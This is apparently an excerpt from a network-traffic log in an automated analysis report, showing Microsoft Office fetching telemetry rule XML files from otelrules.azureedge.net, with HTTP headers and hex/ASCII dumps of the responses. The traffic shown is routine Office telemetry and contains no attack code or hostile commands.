                                                                                                                                                                          2024-11-23 18:02:07 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          101192.168.2.54986013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:07 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:07 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1356
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                          ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                          x-ms-request-id: 31c6069e-e01e-001f-7f36-3d1633000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180207Z-15b8b599d88tr2flhC1TEB5gk4000000039g00000000k46g
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:07 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          102192.168.2.54987713.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:09 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:09 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1395
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                          ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                          x-ms-request-id: 1a87898e-001e-002b-2066-3b99f2000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180209Z-178bfbc474brk967hC1NYCfu6000000004g000000000kd8a
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:09 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          103192.168.2.54987913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:09 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:09 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1358
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                          ETag: "0x8DC582BE6431446"
                                                                                                                                                                          x-ms-request-id: 87533e62-501e-008f-028c-3a9054000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180209Z-174c587ffdf9xbcchC1TEBxkz4000000033g00000000d7yg
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:09 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          104192.168.2.54988013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:09 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:09 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1395
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                          ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                          x-ms-request-id: 2b667d2c-b01e-003d-150c-3dd32c000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180209Z-178bfbc474bgvl54hC1NYCsfuw00000004pg00000000nffa
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:09 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          105192.168.2.54988113.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:09 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:09 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1358
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                          ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                          x-ms-request-id: 16dd49bc-d01e-0066-804e-3cea17000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180209Z-178bfbc474bq2pr7hC1NYCkfgg000000051g000000001ykq
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:09 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          106192.168.2.54988213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:09 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:09 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                          ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                          x-ms-request-id: 80a20124-101e-0046-4f43-3c91b0000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180209Z-15b8b599d88wk8w4hC1TEB14b8000000039000000000d8pk
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:09 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          107192.168.2.54988613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:11 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:11 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1405
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                          ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                          x-ms-request-id: b43d4aba-301e-0020-1845-3c6299000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180211Z-174c587ffdf8fcgwhC1TEBnn7000000003cg00000000gfs4
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:12 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          108192.168.2.54988813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:11 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:11 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1368
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                          ETag: "0x8DC582BDDC22447"
                                                                                                                                                                          x-ms-request-id: fb424ae8-401e-0015-5d91-3d0e8d000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180211Z-15b8b599d88f9wfchC1TEBm2kc00000003g00000000027ge
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:12 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          109192.168.2.54988513.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:11 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:11 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1352
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                          ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                          x-ms-request-id: 6226193a-f01e-00aa-5d6c-3d8521000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180211Z-15b8b599d885v8r9hC1TEB104g00000003bg0000000083vy
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:12 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          110192.168.2.54989013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:11 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:11 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1364
